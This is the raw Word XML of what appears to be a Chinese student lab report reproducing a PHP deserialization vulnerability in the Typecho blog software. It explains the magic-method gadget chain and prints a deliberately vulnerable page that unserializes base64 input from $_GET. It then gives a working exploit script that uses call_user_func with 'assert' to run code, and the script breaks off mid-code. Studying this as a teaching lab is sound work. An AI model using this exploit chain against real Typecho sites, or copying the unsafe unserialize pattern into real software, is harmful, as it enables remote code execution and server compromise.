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 xml:space="preserve">： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>艾明旭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学号：2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>11103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3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信息安全一班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复现反序列化漏洞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复现12.2.3中的反序列化漏洞，并执行其他的系统命令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FandolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">序列化与反序列化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andolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">在各类语言中，将对象的状态信息转换为可存储或可传输的过程就是序列化，序列化的逆过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andolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">程便是反序列化，主要是为了方便对象的传输，通过文件、网络等方式将序列化后的字符串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FandolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>进行传输，最终通过反序列化可以获取之前的对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>以 php 为例的反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>PHP 有一类特殊的方法，它们以 __(两个下划线) 开头，在特定的条件下会被调用，例如</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>类的构造方法 __destruct()，destruct 是对象被销毁的时候进行调用，通常 PHP 在程序块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>执行结束时进行垃圾回收，这将进行对象销毁，然后自动触发 destruct 魔术方法，如果魔术方法还存在一些恶意代码，即可完成攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>PHP反序列化漏洞又叫PHP对象注入漏洞。在一个应用中，如果传给unserialize()的参数是用户可控的，那么攻击者就可以通过传入一个精心构造的序列化字符串，利用PHP魔术方法来控制对象内部的变量甚至是函数。对这一类漏洞的利用，往往需要分析web应用的源代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>下面是复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>反序列化漏洞的过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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创建typecho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>该web应用通过$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>_GET[‘__typecho_config’]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">从用户处获取了反序列化的对象，满足反序列化漏洞的基本条件，unserialize()的参数可控，这里是漏洞的入口点。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>class Typecho_Db{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    public function __construct($adapterName){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        $adapterName = 'Typecho_Db_Adapter_' . $adapterName;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}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class Typecho_Feed{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    private $item;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    public function __toString(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        $this-&gt;item['author']-&gt;screenName;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}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class Typecho_Request{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 xml:space="preserve">    private $_params = array();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    private $_filter = array();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 xml:space="preserve">    public function __get($key)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        return $this-&gt;get($key);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    }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 xml:space="preserve">    public function get($key, $default = NULL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        switch (true) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">            case isset($this-&gt;_params[$key]):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                $value = $this-&gt;_params[$key];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">            default:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                $value = $default;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        $value = !is_array($value) &amp;&amp; strlen($value) &gt; 0 ? $value : $default;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        return $this-&gt;_applyFilter($value);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    }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 xml:space="preserve">    private function _applyFilter($value)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        if ($this-&gt;_filter) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">            foreach ($this-&gt;_filter as $filter) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                $value = is_array($value) ? array_map($filter, $value) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                call_user_func($filter, $value);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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 xml:space="preserve">            $this-&gt;_filter = array();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        }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 xml:space="preserve">        return $value;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$config = unserialize(base64_decode($_GET['__typecho_config']));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>$db = new Typecho_Db($config['adapter']);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1164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Cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>• 这里只需要把 payload 构造在一个 Typecho_Requsest 类的 params 和 filter 中，再</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>将该类封装在 Typecho_Feed 类的 item 中，最后将这个 Feed 对象序列化、base64 加密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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即可完成攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1594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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>程序实例化了类Ty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pecho_Db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，类的参数是通过反序列化得到的$config。在类Typecho_Db的构造函数中，进行了字符串拼接的操作，而在PHP魔术方法中，如果一个类被当做字符串处理，那么类中的__toString()方法将会被调用。全局搜索，发现类Typecho_Feed中存在__toString()方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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在类Typecho_Fee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>的__toString()方法中，会访问类中私有变量$item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>‘author’]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>中的screenName，这里又有一个PHP反序列化的知识点，如果$item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>‘author’]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>是一个对象，并且该对象没有screenName属性，那么这个对象中的__get()，方法将会被调用，在Typecho_Request类中，正好定义了__get()方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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类Typecho_Request中的__get()方法会返回get()，get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>中调用了_applyFilter()方法，而在_applyFilter()中，使用了PHP的call_user_function()函数，其第一个参数是被调用的函数，第二个参数是被调用的函数的参数，在这里$filter，$value都是我们可以控制的，因此可以用来执行任意系统命令。至此，一条完整的利用链构造成功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这里只需要把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payload 构造在一个 Typecho_Requsest 类的 params 和 filter 中，再将该类封装在 Typecho_Feed 类的 item 中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，最后将这个 Feed 对象序列化、base64 加密即可完成攻击。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构造 payload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• 分析源码，根据上述漏洞思路，可以知道核心注入点在 params 和 filter 处，令 params 为asser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函数可以执行任意代码，而 filter 处则构造我们的恶意代码 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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根据上述思路，写出对应的利用代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>class Typecho_Feed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    private $item;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    public function __construct(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        $this-&gt;item = array(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">            'author' =&gt; new Typecho_Request(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        );</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>class Typecho_Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    private $_params = array();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    private $_filter = array();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    public function __construct(){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        $this-&gt;_params['screenName'] = 'phpinfo()';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        $this-&gt;_filter[0] = 'assert';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
